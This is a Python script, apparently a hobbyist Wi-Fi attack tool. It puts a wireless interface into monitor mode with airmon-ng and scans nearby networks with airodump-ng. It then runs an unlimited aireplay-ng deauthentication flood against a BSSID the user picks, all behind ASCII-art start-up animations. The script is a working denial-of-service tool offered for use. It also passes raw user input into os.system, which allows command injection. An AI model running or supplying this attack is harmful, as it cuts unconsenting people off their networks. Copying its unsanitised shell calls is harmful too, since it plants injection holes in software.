import os
import time
import signal
import sys

class color:
    red = '\33[91m'
    white = '\033[0m'
    logging = '\34m'
    underline = '\033[4m'
    warning = '\033[93m'
    green = '\033[92m'
    blue = '\033[94m'

def signal_handler(sig, frame):

    print()
    print("\nCtrl+C pressed, exiting...")

    sys.exit(0)


signal.signal(signal.SIGINT, signal_handler)

os.system('clear')
print()
print("             *******   *******")
print("              *****     *****    ")
print("               ***       ***    ")
print("                I         I    ")
print("                888888" + color.green + "00" + color.white + "888    ")
print("                88888888888    ")
print()
print('starting...')
time.sleep(2)
os.system('clear')
print()
print("              *****     *****  ")
print("               ***       ***    ")
print("                I         I    ")
print("                I         I    ")
print("                888888" + color.green + "00" + color.white + "888    ")
print("                88888888888    ")
print()
print('starting*..')
time.sleep(1.5)
os.system('clear')
print()
print("               ***       ***    ")
print("                I         I    ")
print("                I         I    ")
print("                I         I    ")
print("                888888" + color.green + "00" + color.white + "888    ")
print("                88888888888    ")
print()
print('starting**.')
time.sleep(1)
os.system('clear')
print()
print("                I         I    ")
print("                I         I    ")
print("                I         I    ")
print("                I         I    ")
print("                888888" + color.green + "0" + color.red + "0" + color.white + "888    ")
print("                88888888888    ")
print()
print('starting***')
time.sleep(0.5)
os.system('clear')
print()
print("                I         I    ")
print("                I         I    ")
print("                I         I    ")
print("                I         I    ")
print("                888888" + color.red + "00" + color.white + "888    ")
print("                88888888888    ")
print()
print('started!')
time.sleep(1)
os.system('clear')
print(color.warning + "v     v     v     IIII   888888   IIII")
print(" v   v v   v       II    88__      II")
print("  v v   v v        II    88**      II")
print("   v     v        IIII   88       IIII")
print()
print("    88      8888  8888      88      /88888   8  88  ")
print("   8  8      88    88      8  8     8        88     ")
print("  888888     88    88     888888    8        8 88   ")
print(" 8      8    88    88    8      8   \\88888  8   88  " + color.white)
print()
print(color.blue + "-----------------------------------------------------------" + color.white)
print()
print("           *    I    ((   I    **")
print("                I  *  ))  I        *")
print("                I    ((   I  *")
print("          **    I     ))  I    ")
print("                888888" + color.red + "00" + color.white + "888    ")
print("                88888888888    ")
print()
print("     The Wifi's are under " + color.underline + "traffic!" + color.white + ".")
print("                          (Attack!)")
print()
print("green mean, your wifi works " + color.underline + color.green + "good" + color.white + ".")
print("red mean, your wifi is under " + color.underline + color.red + "attack" + color.white + "!.")
print()
print()
print("""this tool uses 'airmon-ng, airodump-ng, aireplay-ng'
if you don't have them please install!""")
print()
print()
time.sleep(1)
if not 'SUDO_UID' in os.environ.keys():
    print("please try running this tool with " + color.underline + color.green + "sudo" + color.white + ".")
    exit()

else:
    os.system('iwconfig')
    print()
    print()
    interface = input("type or copy your interface (choose your " + color.underline + "wifi interface" + color.white + "!): ")
    print()
    print("choosing...")
    time.sleep(1)
    print()
    print("Done!")
    time.sleep(1)
    os.system('clear')
    print()
    print("killing any " + color.underline + "airmon-ng" + color.white + " proccess...")
    time.sleep(0.5)
    os.system('sudo airmon-ng check kill')
    print()
    print('Done')
    time.sleep(0.5)
    os.system('clear')
    print()
    print(f"turning your {interface} into the monitor mode...")
    time.sleep(0.5)
    os.system(f'sudo airmon-ng start {interface}')
    print()
    print()
    print("Done!")
    time.sleep(0.5)
    os.system('clear')
    print()
    print("start scanning the wifi's around you...")
    print()
    print("press ctrl+C to end the scanning!")
    time.sleep(2)
    os.system(f'airodump-ng {interface}')
    print()
    print()
    addressmac = input("type or copy the target bssid address (paste the entire BSSID): ")
    print()
    print()
    print("Done!")
    time.sleep(0.5)
    os.system('clear')
    print()
    print("starting the attack...")
    time.sleep(1)
    print("started!")
    print()
    os.system(f'sudo aireplay-ng --deauth 0 -a {addressmac} {interface}')
    print()
    print()
    print("We doned with the attack.")
    print()
    print()
    print("exiting from monitor mode...")
    time.sleep(1)
    os.system(f'airmon-ng stop {interface}')
    print()
    print("Done!")
    time.sleep(0.5)
    


#08:18:56  Waiting for beacon frame (BSSID: F6:5E:9D:D8:BF:8F) on channel 12                                
#08:19:06  No such BSSID available.